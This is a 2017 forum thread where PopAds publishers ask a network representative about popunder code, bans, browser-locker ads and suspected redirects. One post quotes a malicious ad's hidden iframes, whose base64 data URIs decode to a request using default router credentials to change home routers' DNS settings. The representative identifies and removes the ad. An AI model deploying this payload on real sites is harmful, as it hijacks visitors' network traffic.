1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

PopAds.net Official Publisher Thread

Discussion in 'Pay Per Click Advertising' started by tomksoft, Aug 20, 2010.

1. w4rkr4f7

w4rkr4f7 Well-Known Member

Best Answers:
    use this code but replace xxxxxxxxxxxx with your siteID and you will have 1 pop per hour

<script type="text/javascript">
    /*<![CDATA[/* */
    var frequencyCap = 1;
    function setCookie(cookieName,cookieValue, expirehours) {
    if (frequencyCap > 0) {
    var today = new Date();
    var expire = new Date();
    expire.setTime(today.getTime() + 3600000 * frequencyCap);
    document.cookie = cookieName+"="+escape(cookieValue) + ";path=/;expires="+expire.toGMTString();
    } else {
    document.cookie = cookieName+"="+escape(cookieValue);
    }
    }
    function ReadCookie(cookieName) {
    var theCookie=""+document.cookie;
    var ind=theCookie.indexOf(cookieName);
    if (ind==-1 || cookieName=="") return "";
    var ind1=theCookie.indexOf(';',ind);
    if (ind1==-1) ind1=theCookie.length;
    return unescape(theCookie.substring(ind+cookieName.length+1,ind1));
    }
    if (ReadCookie('cookie1hour') != '1')
    {
    setCookie('cookie1hour','1', frequencyCap);
    var _pop = _pop || [];
    _pop.push(['siteId', xxxxxxxxxxxx]);
    _pop.push(['minBid', 0]);
    _pop.push(['popundersPerIP', 0]);
    _pop.push(['delayBetween', 0]);
    _pop.push(['default', false]);
    _pop.push(['defaultPerDay', 0]);
    _pop.push(['topmostLayer', false]);
    (function() {
    var pa = document.createElement('script'); pa.type = 'text/javascript'; pa.async = true;
    var s = document.getElementsByTagName('script')[0];
    pa.src = '//c1.popads.net/pop.js';
    pa.onerror = function() {
    var sa = document.createElement('script'); sa.type = 'text/javascript'; sa.async = true;
    sa.src = '//c2.popads.net/pop.js';
    s.parentNode.insertBefore(sa, s);
    };
    s.parentNode.insertBefore(pa, s);
    })();
    }
    /*]]>/* */
    </script>

w4rkr4f7, Apr 10, 2017 IP
  2. kikker

kikker Well-Known Member

Best Answers:
    UnicodeSeeker , w4rkr4f7 thanks for help
    but when you do change it . its not opening first popunder also ..
    I put the code in player .. %80 of my website visitors USA UK CA AU rate is $1.59 for this visitors
    %20 is Eu NZ and some other country

google analytic and stats counter shows 2000 video played
    popads shows 900 popunder
    and they open twice popunder for each visitors

rate is $1.59 for this visitors

kikker, Apr 11, 2017 IP
  3. Evilness

Evilness Greenhorn

Best Answers:
    Hello anyone from popads checks this thread? Trying to get support through the official channels since a month now with no luck. I'm a long time popads publisher and having full page redirect issues. I keep getting replies from "Gordon Ho" when I contact popads but he really doesn't understand what I'm saying. He keeps linking me to a page that doesn't work. Looks like a bot replying to tickets. How can I speak to an actual technical support person and not a robot? Thanks.

Last edited: Apr 12, 2017
    Evilness, Apr 12, 2017 IP
  4. tomksoft

tomksoft Well-Known Member

Best Answers:
    Still depends on many factors, sorry. Desktop will be different, mobile different, mobile from certain carriers even more different.

Done, I am sorry for the delay.

No, it is not a problem. We do not even use IP for matching accounts in our multiaccount detection system(too many false positive, not even due to dynamic IPs, but many people use same VPN and share same IP).

As stated above, that is a lie. If you however use the same computer as someone who abused PopAds then I will ban your account.

Our ad does not open after 2nd click and it does not open twice. If you click twice on your website and get two different pops then it means you have an adcode from another adnetwork.

Our adcode does not do full page redirections. It is only capable of opening popup, popunder, tabup and tabunder.
    If you can provide any proof of that really happening then I will be happy to look into(I guess I'd need at least a recording + full information on browser/OS used).
    If you just got warning from Google that there are redirections then there is zero details that would allow me to investigate anything or even to prove that the issue is caused by our adcode.

tomksoft, Apr 12, 2017 IP
  5. MadKelevra

MadKelevra Greenhorn

Best Answers:
    Some advertisers are running some background process through iframes... (dont open these sites in chrome or any browser. )... use view-souce to see their codes
    samples:
    adv: view-source:http://tuasaude.com.saude.ws/

iframe
    iframe src=" http: //vai.la/rMEZ " frameborder="0" width="0" height="0">/iframe

going to
    view-source:http://terranostrajericoaco.tempsite.ws/

iframe src="data:text/html;base64,PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlIHR5cGU9InRleHQvY3NzIj5AaW1wb3J0IHVybChodHRwOi8vYWRtaW46YWRtaW5AMTg2LjIwOC43Ni4xNC91c2VyUnBtL1dhbkR5bmFtaWNJcENmZ1JwbS5odG0/d2FuPTAmd2FudHlwZT0wJm10dT0xNTAwJm1hbnVhbD0yJmRuc3NlcnZlcj0xNDkuNTYuMTQ3LjIxJmRuc3NlcnZlcjI9MTQ0LjIxNy4yMzcuMjA4Jmhvc3ROYW1lPVRQLUxJTksmU2F2ZT1TYXZlKTs8L3N0eWxlPicpOzwvc2NyaXB0Pg==" style="display:none; top:0; left:0;" width:auto; height:auto; >/iframe
    iframe src="data:text/html;base64,PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlIHR5cGU9InRleHQvY3NzIj5AaW1wb3J0IHVybChodHRwOi8vYWRtaW46YWRtaW5AMTkyLjE2OC4xLjEvdXNlclJwbS9XYW5EeW5hbWljSXBDZmdScG0uaHRtP3dhbj0wJndhbnR5cGU9MCZtdHU9MTUwMCZtYW51YWw9MiZkbnNzZXJ2ZXI9MTQ5LjU2LjE0Ny4yMSZkbnNzZXJ2ZXIyPTE0NC4yMTcuMjM3LjIwOCZob3N0TmFtZT1UUC1MSU5LJlNhdmU9U2F2ZSk7PC9zdHlsZT4nKTs8L3NjcmlwdD4=" style="display:none; top:0; left:0;" width:auto; height:auto; >/iframe
    iframe

.... I dont know whats it... I am not an expert about this, My Kaspersky dont found anything BUT my CPU load goes up to +50% while seeing some of these adv

MadKelevra, Apr 12, 2017 IP
  6. tomksoft

Best Answers:
    This add was taken down about an hour ago by our automated system. The ad itself loads an iframe that tries to change DNS settings on home routers.
    We are aware of such kind of bad ads(mostly affecting Brazil) and we have technology to catch these pretty early.

tomksoft, Apr 12, 2017 IP
  7. Evilness

Evilness Greenhorn

Best Answers:
    Ok first of all the page popads.net/websites/abuse doesn't work. I keep geting "We have no record of the entered popunder." On that page there's no mention of recording, full information etc. I can't give you those details even if I wanted because it's our visitors who tell us they get them. When I remove the code the redirects stop so I'm pretty sure it's popads.net. A user reported they were redirected to this page: twitter1.ga/?amigos=3njRyIMhPl Another one sent this screenshot: https://dbr.ee/9oyg That's all I have.

Evilness, Apr 12, 2017 IP
  8. tomksoft

Best Answers:
    It does work, just not the way you'd think. Basically, if you have close to no information and tell me "there is virus in your ads", there is literally nothing I can do. We have 7000 direct active campaigns and we are linked to like 15 other adnetworks that supply their ads.
    It is impossible for me to sit down and go through all of them and check them manually.

The report abuse tool does work, however it has to be used by the person who got the advertisement. Then the system will find which exactly ads the person got and will flag them for review. If you submit it yourself for someone else, it just won't work.

Now, regarding these two ads. For the twitter1.ga I am unable to find anything at all. We have no history of that domain, even no details on Alexa for that domain that would prove that it was getting traffic from us.
    For the one from screenshot, I managed to find it. It belonged to a user banned on 27 March (so a bit over 2 weeks ago). That user keept on trying doing campaigns like that(extension forcer browser locking) and had quite many multiaccounts.

Finally, for "redirection". I think the problem is that your visitors do not understand what is popup and what is redirection and they give you wrong information. The ad from screenshot is bad, it is a browser locker, it is something we ban accounts for every day.
    However, it still opens as a popup or popunder and it never is a redirection of your website.

tomksoft, Apr 13, 2017 IP
  9. Evilness

Evilness Greenhorn

Best Answers:
    Ok I see tnx for clearing up things for me. Yes the screenshot is old I just wanted to put whatever I have. For the abuse tool though, I see you have to be a member to submit, so visitors have to actually sign up and all to submit a bad ad? That's not very efficient imo. Also that twitter1.ga is redirecting to http://forex24hora.ga/noticias-de-forex/own-account-investors-create-an-association-for-mifid-ii/ maybe you can find that domain?

Evilness, Apr 13, 2017 IP
  10. BlasterRabbit

BlasterRabbit Peon

Best Answers:
    Its a bummer you dont have direct url so i can set you up as fallback at zeropark

BlasterRabbit, Apr 13, 2017 IP
  11. wiiadmin

wiiadmin Greenhorn

Best Answers:
    I agree, and have mailed them about it, but they replied saying if they had direct url, the pop rates wouldn't be as good.

Basically direct url is quite not dangerous, but isn't good for the advertiser as it can be manipulated and a lot do so. And this would lead to poor rates.

wiiadmin, Apr 13, 2017 IP
  12. tomksoft

Best Answers:
    Not true, we do have abuse report form at https://www.popads.net/report-abuse.html
    The one in the panel (after logging in) has some more options so you can report abuse if you know the visitor IP address. Yet you can just give the report abuse link to any visitor and they can submit a report(yet, that has to be done in max 48h from the incident).

Sorry, no direct link.

Exactly, that's the reason. The technologies we have at PopAds for fraud screening would not be able to work on direct URL and allowing bot traffic would result in further reduction in rates.
    That's something we are totally not interested in.

13. alia1k2

alia1k2 Greenhorn

Best Answers:
    @tomksoft is there a way to know if my campaign got banned ?

alia1k2, Apr 13, 2017 IP
  14. tomksoft

Best Answers:
    Do you think you did anything wrong? I will be happy to check if you let me know your username.

15. alia1k2

alia1k2 Greenhorn

Best Answers:
    I ran some third party ads, so i wouldnt know if i did. but i do believe i got banned for multiacounts. I've made other accounts for organizing purposes not knowing about the mutiaccounts rules and i contacted the support telling them about the mistake but i did recieve an automated resonse . but oh well it was my mistake you can check for me if you want username: vnfnnc username2:alikravtanali there are few others as well

alia1k2, Apr 13, 2017 IP
  16. Evilness

Evilness Greenhorn

Best Answers:
    Ok this can work tnx. I'm glad I found this thread, much better and faster support than the official ticketing system.

Last edited: Apr 13, 2017
    Evilness, Apr 13, 2017 IP
  17. AdkManager

AdkManager Peon

Best Answers:
    Hello Tom,

I'm experiencing a 98% drop in ads serving in the last 48 hours. Things on my side seems ok. I contacted the support but I never got an answer.
    Please check ticket 45832. I'm not asking for an answer here. I would like to keep everything on the ticket but Customer Support is ignoring my requests.

Thank you

AdkManager, Apr 14, 2017 IP
  18. tomksoft

Best Answers:
    That is correct. We have detected tech support browser locking on at least 2 of your accounts. Then, as I noticed that you have plenty of accounts(and pretty much all of them registered under different names) I judged that you are doing that on purpose. Here is a screenshot from our multiaccount detection system:
    [​IMG]

You sent first email less than 24h ago. We do not work that fast, sorry.
    I checked your website and the adcode is just broken(all backslashes are removed). Nothing wrong on our end.

tomksoft, Apr 14, 2017 IP
  19. Matanza

Matanza Peon

Best Answers:
    No popup showing for me since april 11th, anyone else?

Matanza, Apr 16, 2017 IP
  20. tomksoft

Best Answers:
    Handling 100M+ pops a day recently, pretty sure we have no network-wide issues.
    Have you tried using our Troubleshooter tool available after logging in?

tomksoft, Apr 16, 2017 IP